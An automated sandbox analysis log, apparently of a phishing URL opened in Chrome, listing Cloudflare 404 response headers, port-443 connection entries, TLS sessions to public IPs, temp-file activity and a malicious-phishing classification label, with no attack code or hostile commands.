              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 15:11:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xmxY8ZU9xk1GKKWceMJi6ZhRN2LgDhoDhbpVeAJ1Aly1Hu9xL0cQvvEAsd0SjamIyFrPKT8nCsZG%2F8Bv1cMg6QdD9PQcO%2FcayTjPxEpWUsoMmA4vnLNIWeizTdwm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=4299&min_rtt=4268&rtt_var=1623&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2276&delivery_rate=667291&cwnd=240&unsent_bytes=0&cid=b1eeda990a0630d9&ts=34&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 9267955428d541bb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=85775&min_rtt=85678&rtt_var=18155&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1937&delivery_rate=35661&cwnd=252&unsent_bytes=0&cid=1abb891dbbc51990&ts=401&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 15:11:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2FtXzYxLm3%2Bq9xIyikI7NCcyDDubjIFNRKJgXoklOi52WSjMkZ1I1KzEtWehPgLTqooxcnxqK9m4zQ5W9gPoPs7al2esPIW%2FMtfwEeFta%2Fx3N0IKdqp74wmfD11Y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=4353&min_rtt=4330&rtt_var=1640&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2054&delivery_rate=657736&cwnd=251&unsent_bytes=0&cid=fb113163c98bf106&ts=114&x=0"Server: cloudflareCF-RAY: 926795575999acc5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=85634&min_rtt=85507&rtt_var=18240&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1716&delivery_rate=35564&cwnd=252&unsent_bytes=0&cid=ef638ef1bf5055ea&ts=476&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 15:12:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GGTCYeZzLjGHOh4Wbx2gtbRW2UqQ6xn3BKb0YpQLAKPH0y1UO8Xz8XUQfJ2427AVgr3%2BTfrkcvt73XTEf9sORd0UnGISHItM0iV50lFh7qDkElLY6TAKkHWrU5zE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=4517&min_rtt=4509&rtt_var=1284&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2077&delivery_rate=623740&cwnd=237&unsent_bytes=0&cid=5dd01e1b42e67599&ts=96&x=0"Server: cloudflareCF-RAY: 9267957769f08c1b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=86400&min_rtt=86023&rtt_var=18439&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1738&delivery_rate=35465&cwnd=252&unsent_bytes=0&cid=818826091366d757&ts=458&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 15:12:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fw3%2FXd291sOApLanML3T4aNyWCrmpVTAyl2YTJJT5TiGfshCLbRhXKctn88ZxwbJwTNYo3j57yXfVYs3i2iJT3%2BvHmCdsQ7WxhTBT7oQzC%2BkLciqoeB2Lk5ed1Ll"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=9701&min_rtt=6205&rtt_var=4824&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2076&delivery_rate=458984&cwnd=251&unsent_bytes=0&cid=1493a304a437b7da&ts=102&x=0"Server: cloudflareCF-RAY: 926795ee1dba64b8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=85756&min_rtt=85626&rtt_var=18265&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1738&delivery_rate=35522&cwnd=252&unsent_bytes=0&cid=dacd871329da2ad8&ts=463&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 15:13:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BFDMxkBqgwA3RM%2BECHRRJuSe%2Bj1i4byizN4zPitzcoif%2Ft%2BDly8utLzQtTab2BH%2F7O%2FwvRo6i%2F%2Bk3ZIpe9VETPziXzvY39RXFDMXuisX6UHAjMSYyr2m%2BBEdnRLN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=4706&min_rtt=4574&rtt_var=1375&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2078&delivery_rate=611683&cwnd=251&unsent_bytes=0&cid=e83d157c26da34e9&ts=124&x=0"Server: cloudflareCF-RAY: 926797120e7f43fa-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=86007&min_rtt=85537&rtt_var=18754&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1738&delivery_rate=35144&cwnd=252&unsent_bytes=0&cid=e7dc65639476b0b9&ts=481&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 26 Mar 2025 15:13:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ARhzScnKcGTEDoN5rGMzKtwW%2F452DwXERdt4VObJj5L4LH33wcodUya9U33L2eIcybcLtaNVo5CaogzEvGFnZCdgUlzUIo%2FdlAflNCA656kLAOrUGF4rTEpY4gaE"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=4211&min_rtt=4190&rtt_var=1586&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2077&delivery_rate=679713&cwnd=251&unsent_bytes=0&cid=7c016baa3e03a037&ts=99&x=0"Server: cloudflareCF-RAY: 926797259f975612-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=86013&min_rtt=85715&rtt_var=18531&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1738&delivery_rate=35288&cwnd=252&unsent_bytes=0&cid=cfeaa852962a7ede&ts=471&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownHTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.16:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 69.49.246.124:443 -> 192.168.2.16:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.221.135:443 -> 192.168.2.16:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.4.189:443 -> 192.168.2.16:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.16:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.16:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.16:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49745 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 44.208.218.209:443 -> 192.168.2.16:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 3.33.248.19:443 -> 192.168.2.16:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 94.124.122.16:443 -> 192.168.2.16:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.16:49756 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.16:49757 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.161.239.131:443 -> 192.168.2.16:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 99.83.148.19:443 -> 192.168.2.16:49761 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 52.223.47.116:443 -> 192.168.2.16:49769 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49784 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.16:49785 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.207.40:443 -> 192.168.2.16:49786 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.207.40:443 -> 192.168.2.16:49787 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49788 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49789 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.34:443 -> 192.168.2.16:49790 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.34:443 -> 192.168.2.16:49791 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.65.238:443 -> 192.168.2.16:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.174:443 -> 192.168.2.16:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.40.174:443 -> 192.168.2.16:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49834 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.190.190.196:443 -> 192.168.2.16:49846 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 20.190.190.196:443 -> 192.168.2.16:49847 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.48.144.218:443 -> 192.168.2.16:49867 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.48.144.218:443 -> 192.168.2.16:49868 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6904_806326616
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6904_806326616
              Source: classification engineClassification label: mal100.phis.evad.win@31/59@91/372
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
